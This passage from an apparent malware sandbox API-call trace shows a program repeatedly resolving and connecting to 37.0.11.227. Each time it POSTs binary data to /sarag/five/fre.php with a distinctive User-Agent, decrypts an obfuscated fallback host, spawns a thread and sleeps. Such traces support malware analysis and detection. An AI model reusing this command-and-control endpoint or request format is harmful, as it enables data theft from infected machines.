namelen=16) returned 0 [0172.973] FreeAddrInfoW (pAddrInfo=0x6a3290*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0172.973] GetProcessHeap () returned 0x690000 [0172.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6ac460 [0172.974] GetProcessHeap () returned 0x690000 [0172.974] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0172.974] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0172.975] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0172.975] GetProcessHeap () returned 0x690000 [0172.975] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac4e8 [0172.975] GetProcessHeap () returned 0x690000 [0172.976] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0172.978] GetProcessHeap () returned 0x690000 [0172.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0172.978] GetProcessHeap () returned 0x690000 [0172.978] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0172.979] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0172.980] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0172.980] GetProcessHeap () returned 0x690000 [0172.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac5a8 [0172.980] GetProcessHeap () returned 0x690000 [0172.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0172.981] send (s=0x26c, buf=0x6ac5a8*, len=242, flags=0) returned 242 [0172.981] send (s=0x26c, buf=0x6aba40*, len=159, flags=0) returned 159 [0172.981] GetProcessHeap () returned 0x690000 [0172.981] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0172.982] recv (in: s=0x26c, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0173.051] GetProcessHeap () returned 0x690000 [0173.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac5a8 | out: hHeap=0x690000) returned 1 [0173.052] GetProcessHeap () returned 0x690000 [0173.052] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0173.053] GetProcessHeap () returned 0x690000 [0173.053] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac4e8 | out: hHeap=0x690000) returned 1 [0173.053] GetProcessHeap () returned 0x690000 [0173.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0173.057] closesocket (s=0x26c) returned 0 [0173.057] GetProcessHeap () returned 0x690000 [0173.057] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4e0 | out: hHeap=0x690000) returned 1 [0173.057] GetProcessHeap () returned 0x690000 [0173.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0173.058] GetProcessHeap () returned 0x690000 [0173.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0173.058] GetProcessHeap () returned 0x690000 [0173.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0173.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1350) returned 0x26c [0173.061] Sleep (dwMilliseconds=0xea60) [0173.062] GetProcessHeap () returned 0x690000 [0173.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0173.063] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.064] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.069] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0173.078] GetProcessHeap () returned 0x690000 [0173.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0173.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.080] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0173.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.081] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.082] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.082] GetProcessHeap () returned 0x690000 [0173.083] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0173.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.084] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0173.086] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.086] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0173.090] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.090] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0173.090] GetProcessHeap () returned 0x690000 [0173.090] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a5fa0 [0173.091] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.092] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0173.093] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.093] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0173.094] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.102] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0173.103] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.103] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0173.103] GetProcessHeap () returned 0x690000 [0173.103] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0173.103] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0173.103] GetProcessHeap () returned 0x690000 [0173.104] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0173.104] GetProcessHeap () returned 0x690000 [0173.104] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a5fa0 | out: hHeap=0x690000) returned 1 [0173.105] GetProcessHeap () returned 0x690000 [0173.105] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0173.105] GetProcessHeap () returned 0x690000 [0173.105] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0173.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.106] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.135] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0173.146] GetProcessHeap () returned 0x690000 [0173.146] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0173.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.147] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0173.153] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.153] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.154] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.155] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.155] GetProcessHeap () returned 0x690000 [0173.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0173.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.159] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0173.170] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.170] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0173.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.182] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0173.182] GetProcessHeap () returned 0x690000 [0173.182] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0173.183] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.184] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0173.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.185] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0173.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.186] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0173.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.188] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0173.188] GetProcessHeap () returned 0x690000 [0173.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3290 [0173.188] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0173.188] GetProcessHeap () returned 0x690000 [0173.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3e0 [0173.188] socket (af=2, type=1, protocol=6) returned 0x270 [0173.189] connect (s=0x270, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0173.215] FreeAddrInfoW (pAddrInfo=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0173.215] GetProcessHeap () returned 0x690000 [0173.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aeee0 [0173.215] GetProcessHeap () returned 0x690000 [0173.215] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0173.216] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0173.217] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0173.217] GetProcessHeap () returned 0x690000 [0173.217] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac460 [0173.217] GetProcessHeap () returned 0x690000 [0173.218] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0173.219] GetProcessHeap () returned 0x690000 [0173.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0173.219] GetProcessHeap () returned 0x690000 [0173.219] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b27b0 [0173.220] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0173.222] wvsprintfA (in: param_1=0x6b27b0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0173.222] GetProcessHeap () returned 0x690000 [0173.222] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ac520 [0173.222] GetProcessHeap () returned 0x690000 [0173.223] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b27b0 | out: hHeap=0x690000) returned 1 [0173.223] send (s=0x270, buf=0x6ac520*, len=242, flags=0) returned 242 [0173.224] send (s=0x270, buf=0x6aba40*, len=159, flags=0) returned 159 [0173.227] GetProcessHeap () returned 0x690000 [0173.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6a4fc8 [0173.227] recv (in: s=0x270, buf=0x6a4fc8, len=4048, flags=0 | out: buf=0x6a4fc8*) returned 204 [0173.298] GetProcessHeap () returned 0x690000 [0173.298] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac520 | out: hHeap=0x690000) returned 1 [0173.298] GetProcessHeap () returned 0x690000 [0173.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0173.299] GetProcessHeap () returned 0x690000 [0173.299] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ac460 | out: hHeap=0x690000) returned 1 [0173.299] GetProcessHeap () returned 0x690000 [0173.300] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aeee0 | out: hHeap=0x690000) returned 1 [0173.300] closesocket (s=0x270) returned 0 [0173.301] GetProcessHeap () returned 0x690000 [0173.301] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3e0 | out: hHeap=0x690000) returned 1 [0173.301] GetProcessHeap () returned 0x690000 [0173.301] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0173.301] GetProcessHeap () returned 0x690000 [0173.302] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0173.302] GetProcessHeap () returned 0x690000 [0173.302] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3290 | out: hHeap=0x690000) returned 1 [0173.302] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6a4fc8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1374) returned 0x270 [0173.305] Sleep (dwMilliseconds=0xea60) [0173.306] GetProcessHeap () returned 0x690000 [0173.306] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0173.307] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.308] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.329] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0173.370] GetProcessHeap () returned 0x690000 [0173.370] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0173.371] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.372] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0173.373] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.373] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.374] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.374] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.374] GetProcessHeap () returned 0x690000 [0173.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0173.378] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.378] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0173.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.379] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0173.380] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.381] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0173.381] GetProcessHeap () returned 0x690000 [0173.381] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0173.382] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.382] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0173.383] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.383] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0173.384] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.384] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0173.385] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.385] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0173.385] GetProcessHeap () returned 0x690000 [0173.385] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3240 [0173.386] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0173.388] GetProcessHeap () returned 0x690000 [0173.388] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3240 | out: hHeap=0x690000) returned 1 [0173.389] GetProcessHeap () returned 0x690000 [0173.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0173.389] GetProcessHeap () returned 0x690000 [0173.389] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0173.389] GetProcessHeap () returned 0x690000 [0173.389] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0173.390] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.391] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0173.399] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.399] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0173.406] GetProcessHeap () returned 0x690000 [0173.406] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0173.407] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.408] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0173.408] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.409] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0173.409] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.410] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0173.410] GetProcessHeap () returned 0x690000 [0173.410] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0173.411] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.412] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0173.412] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.413] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0173.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0173.414] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0173.414] GetProcessHeap () returned 0x690000 [0173.414] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0173.415] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.415] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0173.416] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.416] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0173.417] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.417] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0173.418] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0173.418] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0173.419] GetProcessHeap () returned 0x690000 [0173.419] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0173.419] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0173.422] GetProcessHeap () returned 0x690000 [0173.422] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab3d0 [0173.422] socket (af=2, type=1, protocol=6) returned 0x274 [0173.422] connect (s=0x274, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0173.450] FreeAddrInfoW (pAddrInfo=0x6a3240*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0173.451] GetProcessHeap () returned 0x690000 [0173.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0173.451] GetProcessHeap () returned 0x690000 [0173.451] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b27b0 [0173.451] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0173.452] wvsprintfA (in: param_1=0x6b27b0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0173.452] GetProcessHeap () returned 0x690000 [0173.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6ac460 [0173.452] GetProcessHeap () returned 0x690000 [0173.453] HeapFree 